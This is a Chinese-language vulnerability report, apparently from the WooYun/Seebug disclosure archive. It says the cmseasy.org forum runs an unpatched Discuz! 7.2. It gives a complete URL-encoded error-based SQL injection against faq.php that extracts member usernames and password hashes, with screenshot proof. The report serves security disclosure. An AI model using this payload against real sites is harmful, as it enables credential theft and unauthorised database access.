### 简要描述:
cmseasy官网论坛(http://www.cmseasy.org)Discuz! 7.2未更新可被注入
### 详细说明:
cmseasy官网论坛是Discuz! 7.2,有一个没打补丁的漏洞
参考链接: [WooYun: Discuz7存在一处SQL注射漏洞(无需登录即可触发)](http://www.wooyun.org/bugs/wooyun-2014-066095)
http://www.cmseasy.org/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x3a,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
[<img src="https://images.seebug.org/upload/201411/132045254af534811bea7b3b87f9d990ba892a25.png" alt="QQ截图20141113204501.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/132045254af534811bea7b3b87f9d990ba892a25.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201411/132045254af534811bea7b3b87f9d990ba892a25.png" alt="QQ截图20141113204501.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/132045254af534811bea7b3b87f9d990ba892a25.png)
暂无评论